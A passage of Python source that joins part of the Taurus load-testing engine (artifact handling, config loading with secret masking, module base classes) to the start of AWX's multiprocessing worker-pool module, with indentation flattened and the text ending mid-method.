self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
"""
loading both JSONs and YAMLs and .properties-like override
dump effective config into files
first config should not contain action prefixes
"""
JSON = "JSON"
YAML = "YAML"
def __init__(self, *args, **kwargs):
super(Configuration, self).__init__(*args, **kwargs)
self.log = logging.getLogger('')
self.dump_filename = None
self.tab_replacement_spaces = 0
self.warn_on_tab_replacement = True
def load(self, config_files, callback=None):
"""
Load and merge JSON/YAML files into current dict
:type callback: callable
:type config_files: list[str]
"""
self.log.debug("Configs: %s", config_files)
for config_file in config_files:
try:
configs = []
with codecs.open(config_file, 'r', encoding='utf-8') as fds:
if self.tab_replacement_spaces:
contents = self._replace_tabs(fds.readlines(), config_file)
else:
contents = fds.read()
self._read_yaml_or_json(config_file, configs, contents)
for config in configs:
self.merge(config)
except KeyboardInterrupt:
raise
except InvalidTaurusConfiguration:
raise
except BaseException as exc:
raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
if callback is not None:
callback(config_file)
def _read_yaml_or_json(self, config_file, configs, contents):
try:
self.log.debug("Reading %s as YAML", config_file)
yaml_documents = list(yaml.load_all(contents))
for doc in yaml_documents:
if doc is None:
continue
if not isinstance(doc, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(doc)
except KeyboardInterrupt:
raise
except BaseException as yaml_load_exc:
self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
if contents.lstrip().startswith('{'):
self.log.debug("Reading %s as JSON", config_file)
config_value = json.loads(contents)
if not isinstance(config_value, dict):
raise InvalidTaurusConfiguration("Configuration %s in invalid" % config_file)
configs.append(config_value)
else:
raise
def set_dump_file(self, filename):
"""
Set default file and format to be used by `dump` method
:type filename: str
"""
self.dump_filename = filename
def write(self, fds, fmt):
"""
Write config into opened file
:type fds: file
:type fmt: str
:raise TaurusInternalException:
"""
if fmt == self.JSON:
json_s = to_json(self)
fds.write(json_s.encode('utf-8'))
elif fmt == self.YAML:
yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
encoding='utf-8', width=float("inf"))
fds.write(yml)
else:
raise TaurusInternalException("Unknown dump format: %s" % fmt)
fds.write("\n".encode('utf-8'))
def dump(self, filename=None, fmt=None):
"""
Dump current state of dict into file. If no filename or format
specified, defaults are used
:type filename: str or NoneType
:type fmt: str or NoneType
"""
if not filename:
filename = self.dump_filename
if filename:
if not fmt:
self.dump(filename + ".yml", self.YAML)
self.dump(filename + ".json", self.JSON)
return
acopy = copy.deepcopy(self)
BetterDict.traverse(acopy, self.masq_sensitive)
BetterDict.traverse(acopy, self.replace_infinities)
with open(filename, "wb") as fhd:
self.log.debug("Dumping %s config into %s", fmt, filename)
acopy.write(fhd, fmt)
@staticmethod
def masq_sensitive(value, key, container):
"""
Remove sensitive data from config
"""
if isinstance(key, string_types):
for suffix in ('password', 'secret', 'token',):
if key.lower().endswith(suffix):
if value and isinstance(value, (string_types, text_type)):
container[key] = '*' * 8
@staticmethod
def replace_infinities(value, key, container):
"""
Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
"""
del value
if isinstance(container[key], float):
if math.isinf(container[key]) or math.isnan(container[key]):
container[key] = str(container[key])
def _replace_tabs(self, lines, fname):
has_tab_indents = re.compile("^( *)(\t+)( *\S*)")
res = ""
for num, line in enumerate(lines):
replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
if replaced != line:
line = replaced
if self.warn_on_tab_replacement:
self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
self.log.warning("Line content is: %s", replaced.strip())
self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
res += line
return res
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
# dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
pass # TODO: how to implement it?
class EngineModule(object):
"""
Base class for any BZT engine module
:type engine: Engine
:type settings: BetterDict
"""
def __init__(self):
self.log = logging.getLogger('')
self.engine = None
self.settings = BetterDict()
self.parameters = BetterDict()
def prepare(self):
"""
Preparation stage, at which configuration is being read, configs
and tools being prepared. All long preparations and checks should be
made here, to make `startup` stage as fast as possible.
"""
pass
def startup(self):
"""
Startup should be as fast as possible. Launch background processes,
do some API calls for initiation of actual work. Consider making all
checks and preparations on `prepare` stage.
"""
pass
def check(self):
"""
Check if work should be finished
:rtype: bool
:return: True if should be finished
"""
return False
def shutdown(self):
"""
Stop all processes that were started in `startup` stage.
Should also be as fast as possible, deferring all long operations to
`post_process` stage.
"""
pass
def post_process(self):
"""
Do all possibly long analysis and processing on run results
"""
pass
def _should_run(self):
"""
Returns True if provisioning matches run-at
"""
prov = self.engine.config.get(Provisioning.PROV)
runat = self.parameters.get("run-at", None)
if runat is not None and prov != runat:
self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
return False
return True
class Provisioning(EngineModule):
"""
Base class for any provisioning type. Provisioning is the way to
get the resources that will run the job. For example, local provisoning
means using local machine to run executors, remote means using
remote machines with BZT API nodes on them.
:type executors: list[ScenarioExecutor]
"""
PROV = "provisioning"
def __init__(self):
super(Provisioning, self).__init__()
self.executors = []
self.disallow_empty_execution = True
def prepare(self):
"""
Preparation in provisioning begins with reading executions list
and instantiating ScenarioExecutor classes for them
"""
super(Provisioning, self).prepare()
exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
if not executions and self.disallow_empty_execution:
raise exc
for execution in executions:
instance = self.engine.instantiate_module(execution.get("executor"))
instance.provisioning = self
instance.execution = execution
assert isinstance(instance, ScenarioExecutor)
self.executors.append(instance)
class FileLister(object):
"""
A mixin to get required files info from executor
"""
@abstractmethod
def resource_files(self):
"""
Get list of resource files
:rtype: list
"""
pass
class ScenarioExecutor(EngineModule):
"""
:type provisioning: engine.Provisioning
:type execution: BetterDict
"""
RAMP_UP = "ramp-up"
HOLD_FOR = "hold-for"
CONCURR = "concurrency"
THRPT = "throughput"
EXEC = "execution"
STEPS = "steps"
LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")
def __init__(self):
super(ScenarioExecutor, self).__init__()
self.env = Environment(log=self.log)
self.provisioning = None
self.execution = BetterDict() # FIXME: why have this field if we have `parameters` from base class?
self.__scenario = None
self.label = None
self.widget = None
self.reader = None
self.stdout = None
self.stderr = None
self.delay = None
self.start_time = None
self.preprocess_args = lambda x: None
def _get_tool(self, tool, **kwargs):
instance = tool(env=self.env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
assert isinstance(instance, RequiredTool)
return instance
def has_results(self):
if self.reader and self.reader.buffer:
return True
else:
return False
def get_script_path(self, required=False, scenario=None):
"""
:type required: bool
:type scenario: Scenario
"""
if scenario is None:
scenario = self.get_scenario()
if required:
exc = TaurusConfigError("You must provide script for %s" % self)
script = scenario.get(Scenario.SCRIPT, exc)
else:
script = scenario.get(Scenario.SCRIPT)
if script:
script = self.engine.find_file(script)
scenario[Scenario.SCRIPT] = script
return script
def get_scenario(self, name=None, cache_scenario=True):
"""
Returns scenario dict, extract if scenario is inlined
:return: DictOfDicts
"""
if name is None and self.__scenario is not None:
return self.__scenario
scenarios = self.engine.config.get("scenarios", force_set=True)
if name is None: # get current scenario
exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
label = self.execution.get('scenario', exc)
is_script = isinstance(label, string_types) and label not in scenarios and \
os.path.exists(self.engine.find_file(label))
if isinstance(label, list):
msg = "Invalid content of scenario, list type instead of dict or string: %s"
raise TaurusConfigError(msg % label)
if isinstance(label, dict) or is_script:
self.log.debug("Extract %s into scenarios" % label)
if isinstance(label, string_types):
scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
else:
scenario = label
path = self.get_script_path(scenario=Scenario(self.engine, scenario))
if path:
label = os.path.basename(path)
if not path or label in scenarios:
hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
label = 'autogenerated_' + hash_str[-10:]
scenarios[label] = scenario
self.execution['scenario'] = label
self.label = label
else: # get scenario by name
label = name
exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
scenario = scenarios.get(label, exc)
scenario_obj = Scenario(self.engine, scenario)
if name is None and cache_scenario:
self.__scenario = scenario_obj
return scenario_obj
def get_load(self):
"""
Helper method to read load specification
"""
def eval_int(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def eval_float(value):
try:
return int(value)
except (ValueError, TypeError):
return value
prov_type = self.engine.config.get(Provisioning.PROV)
throughput = eval_float(self.execution.get(ScenarioExecutor.THRPT).get(prov_type, 0))
concurrency = eval_int(self.execution.get(ScenarioExecutor.CONCURR).get(prov_type, 0))
iterations = eval_int(self.execution.get("iterations", None))
ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)
steps = eval_int(self.execution.get(ScenarioExecutor.STEPS, None))
hold = dehumanize_time(self.execution.get(ScenarioExecutor.HOLD_FOR, 0))
if ramp_up is None:
duration = hold
else:
ramp_up = dehumanize_time(ramp_up)
duration = hold + ramp_up
if duration and not iterations:
iterations = 0 # which means infinite
msg = ''
if not isinstance(concurrency, numeric_types + (type(None),)):
msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
if not isinstance(throughput, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
if not isinstance(steps, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(steps).__name__, steps)
if not isinstance(iterations, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(iterations).__name__, iterations)
if msg:
raise TaurusConfigError(msg)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=duration, steps=steps)
def get_resource_files(self):
files_list = []
if isinstance(self, FileLister):
files_list.extend(self.resource_files())
files_list.extend(self.execution.get("files", []))
return files_list
def __repr__(self):
return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))
def execute(self, args, **kwargs):
self.preprocess_args(args)
# for compatibility with other executors
kwargs["stdout"] = kwargs.get("stdout", self.stdout) or PIPE
kwargs["stderr"] = kwargs.get("stderr", self.stderr) or PIPE
kwargs["cwd"] = kwargs.get("cwd", None)
kwargs["env"] = self.env
try:
process = self.engine.start_subprocess(args=args, **kwargs)
except OSError as exc:
raise ToolError("Failed to start %s: %s (%s)" % (self.__class__.__name__, exc, args))
return process
def post_process(self):
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
super(ScenarioExecutor, self).post_process()
class Reporter(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
REP = "reporting"
def should_run(self):
return self._should_run()
class Service(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
SERV = "services"
def should_run(self):
return self._should_run()
class Aggregator(EngineModule):
def __init__(self, is_functional):
super(Aggregator, self).__init__()
self.is_functional = is_functional
class Scenario(UserDict, object):
"""
Test scenario entity
"""
SCRIPT = "script"
COOKIES = "cookies"
FIELD_RESP_CODE = "http-code"
FIELD_HEADERS = "headers"
FIELD_BODY = "body"
FIELD_DATA_SOURCES = 'data-sources'
def __init__(self, engine, scenario=None):
super(Scenario, self).__init__()
self.engine = engine
self.data = scenario
def get(self, key, default=defaultdict):
"""
:param key:
:type default: object
:return:
"""
return self.data.get(key, default)
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
self.data[key] = value
def __iter__(self):
for item in self.data:
yield item
def __len__(self):
return len(self.data)
def __delitem__(self, key):
return self.data.pop(key)
def get_headers(self):
"""
Returns global headers
:rtype: dict[str,str]
"""
scenario = self
headers = scenario.get("headers", {})
if headers is None:
headers = {}
return headers
def get_requests(self, parser=RequestParser, require_url=True):
"""
Generator object to read requests
:type require_url: bool
:type parser: class
:rtype: list[bzt.requests_model.Request]
"""
requests_parser = parser(self, self.engine)
return requests_parser.extract_requests(require_url=require_url,)
def get_data_sources(self):
data_sources = self.get(self.FIELD_DATA_SOURCES, [])
if not isinstance(data_sources, list):
raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
for index, _ in enumerate(data_sources):
ensure_is_dict(data_sources, index, "path")
return self.get(self.FIELD_DATA_SOURCES, [])
class HavingInstallableTools(object):
@abstractmethod
def install_required_tools(self):
pass
class Singletone(object):
pass
class SelfDiagnosable(object):
@abstractmethod
def get_error_diagnostics(self):
"""
:rtype: list[str]
"""
pass
|
pool.py
|
import logging
import os
import random
import sys
import traceback
from uuid import uuid4
import collections
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from queue import Full as QueueFull, Empty as QueueEmpty
from django.conf import settings
from django.db import connection as django_connection, connections
from django.core.cache import cache as django_cache
from jinja2 import Template
import psutil
from awx.main.models import UnifiedJob
from awx.main.dispatch import reaper
if 'run_callback_receiver' in sys.argv:
logger = logging.getLogger('awx.main.commands.run_callback_receiver')
else:
logger = logging.getLogger('awx.main.dispatch')
class PoolWorker(object):
'''
Used to track a worker child process and its pending and finished messages.
This class makes use of two distinct multiprocessing.Queues to track state:
- self.queue: this is a queue which represents pending messages that should
be handled by this worker process; as new AMQP messages come
in, a pool will put() them into this queue; the child
process that is forked will get() from this queue and handle
received messages in an endless loop
- self.finished: this is a queue which the worker process uses to signal
that it has finished processing a message
When a message is put() onto this worker, it is tracked in
self.managed_tasks.
Periodically, the worker will call .calculate_managed_tasks(), which will
cause messages in self.finished to be removed from self.managed_tasks.
In this way, self.managed_tasks represents a view of the messages assigned
to a specific process. The message at [0] is the least-recently inserted
message, and it represents what the worker is running _right now_
(self.current_task).
A worker is "busy" when it has at least one message in self.managed_tasks.
It is "idle" when self.managed_tasks is empty.
'''
def __init__(self, queue_size, target, args):
self.messages_sent = 0
self.messages_finished = 0
self.managed_tasks = collections.OrderedDict()
self.finished = MPQueue(queue_size)
self.queue = MPQueue(queue_size)
self.process = Process(target=target, args=(self.queue, self.finished) + args)
self.process.daemon = True
def start(self):
self.process.start()
def put(self, body):
uuid = '?'
if isinstance(body, dict):
if not body.get('uuid'):
body['uuid'] = str(uuid4())
uuid = body['uuid']
logger.debug('delivered {} to worker[{}] qsize {}'.format(
uuid, self.pid, self.qsize
))
self.managed_tasks[uuid] = body
self.queue.put(body, block=True, timeout=5)
self.messages_sent += 1
self.calculate_managed_tasks()
def quit(self):
'''
Send a special control message to the worker that tells it to exit
gracefully.
'''
self.queue.put('QUIT')
@property
def pid(self):
return self.process.pid
@property
def qsize(self):
return self.queue.qsize()
@property
def alive(self):
return self.process.is_alive()
@property
def mb(self):
if self.alive:
return '{:0.3f}'.format(
psutil.Process(self.pid).memory_info().rss / 1024.0 / 1024.0
)
return '0'
@property
def exitcode(self):
return str(self.process.exitcode)
def calculate_managed_tasks(self):
# look to see if any tasks were finished
finished = []
for _ in range(self.finished.qsize()):
try:
finished.append(self.finished.get(block=False))
except QueueEmpty:
break # qsize is not always _totally_ up to date
# if any tasks were finished, removed them from the managed tasks for
# this worker
for uuid in finished:
try:
del self.managed_tasks[uuid]
self.messages_finished += 1
except KeyError:
# ansible _sometimes_ appears to send events w/ duplicate UUIDs;
# UUIDs for ansible events are *not* actually globally unique
# when this occurs, it's _fine_ to ignore this KeyError because
# the purpose of self.managed_tasks is to just track internal
# state of which events are *currently* being processed.
logger.warn('Event UUID {} appears to be have been duplicated.'.format(uuid))
@property
def current_task(self):
self.calculate_managed_tasks()
# the task at [0] is the one that's running right now (or is about to
# be running)
if len(self.managed_tasks):
return self.managed_tasks[list(self.managed_tasks.keys())[0]]
return None
@property
def orphaned_tasks(self):
orphaned = []
if not self.alive:
# if this process had a running task that never finished,
# requeue its error callbacks
current_task = self.current_task
if isinstance(current_task, dict):
orphaned.extend(current_task.get('errbacks', []))
# if this process has any pending messages requeue them
for _ in range(self.qsize):
try:
message = self.queue.get(block=False)
if message != 'QUIT':
orphaned.append(message)
except QueueEmpty:
break # qsize is not always _totally_ up to date
if len(orphaned):
logger.error(
'requeuing {} messages from gone worker pid:{}'.format(
len(orphaned), self.pid
)
)
return orphaned
@property
def busy(self):
self.calculate_managed_tasks()
return len(self.managed_tasks) > 0
@property
def idle(self):
return not self.busy
class WorkerPool(object):
'''
Creates a pool of forked PoolWorkers.
As WorkerPool.write(...) is called (generally, by a kombu consumer
implementation when it receives an AMQP message), messages are passed to
one of the multiprocessing Queues where some work can be done on them.
class MessagePrinter(awx.main.dispatch.worker.BaseWorker):
def perform_work(self, body):
print(body)
pool = WorkerPool(min_workers=4) # spawn four worker processes
pool.init_workers(MessagePrint().work_loop)
pool.write(
0, # preferred worker 0
'Hello, World!'
)
'''
debug_meta = ''
def __init__(self, min_workers=None, queue_size=None):
self.name = settings.CLUSTER_HOST_ID
self.pid = os.getpid()
self.min_workers = min_workers or settings.JOB_EVENT_WORKERS
self.queue_size = queue_size or settings.JOB_EVENT_MAX_QUEUE_SIZE
self.workers = []
def __len__(self):
return len(self.workers)
def init_workers(self, target, *target_args):
self.target = target
self.target_args = target_args
for idx in range(self.min_workers):
self.up()
def up(self):
idx = len(self.workers)
# It's important to close these because we're _about_ to fork, and we
# don't want the forked processes to inherit the open sockets
# for the DB and memcached connections (that way lies race conditions)
django_connection.close()
django_cache.close()
worker = PoolWorker(self.queue_size, self.target, (idx,) + self.target_args)
self.workers.append(worker)
try:
worker.start()
except Exception:
logger.exception('could not fork')
else:
logger.warn('scaling up worker pid:{}'.format(worker.pid))
return idx, worker
def debug(self, *args, **kwargs):
self.cleanup()
tmpl = Template(
'{{ pool.name }}[pid:{{ pool.pid }}] workers total={{ workers|length }} {{ meta }} \n'
'{% for w in workers %}'
'. worker[pid:{{ w.pid }}]{% if not w.alive %} GONE exit={{ w.exitcode }}{% endif %}'
' sent={{ w.messages_sent }}'
' finished={{ w.messages_finished }}'
' qsize={{ w.managed_tasks|length }}'
' rss={{ w.mb }}MB'
'{% for task in w.managed_tasks.values() %}'
'\n - {% if loop.index0 == 0 %}running {% else %}queued {% endif %}'
'{{ task["uuid"] }} '
'{% if "task" in task %}'
'{{ task["task"].rsplit(".", 1)[-1] }}'
# don't print kwargs, they often contain launch-time secrets
'(*{{ task.get("args", []) }})'
'{% endif %}'
'{% endfor %}'
'{% if not w.managed_tasks|length %}'
' [IDLE]'
'{% endif %}'
'\n'
'{% endfor %}'
)
return tmpl.render(pool=self, workers=self.workers, meta=self.debug_meta)
def write(self, preferred_queue, body):
queue_order = sorted(range(len(self.workers)), key=lambda x: -1 if x==preferred_queue else x)
write_attempt_order = []
for queue_actual in queue_order:
try:
self.workers[queue_actual].put(body)
return queue_actual
except QueueFull:
pass
except Exception:
tb = traceback.format_exc()
logger.warn("could not write to queue %s" % preferred_queue)
logger.warn("detail: {}".format(tb))
write_attempt_order.append(preferred_queue)
logger.error("could not write payload to any queue, attempted order: {}".format(write_attempt_order))
return None
def stop(self, signum):
try:
for worker in self.workers:
os.kill(worker.pid, signum)
except Exception:
logger.exception('could not kill {}'.format(worker.pid))
class AutoscalePool(WorkerPool):
'''
An extended pool implementation that automatically scales workers up and
down based on demand
'''
def __init__(self, *args, **kwargs):
self.max_workers = kwargs.pop('max_workers', None)
super(AutoscalePool, self).__init__(*args, **kwargs)
if self.max_workers is None:
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
if settings_absmem is not None:
total_memory_gb = int(settings_absmem)
else:
total_memory_gb = (psutil.virtual_memory().total >> 30) + 1 # noqa: round up
# 5 workers per GB of total memory
self.max_workers = (total_memory_gb * 5)
# max workers can't be less than min_workers
self.max_workers = max(self.min_workers, self.max_workers)
@property
def should_grow(self):
if len(self.workers) < self.min_workers:
# If we don't have at least min_workers, add more
return True
# If every worker is busy doing something, add more
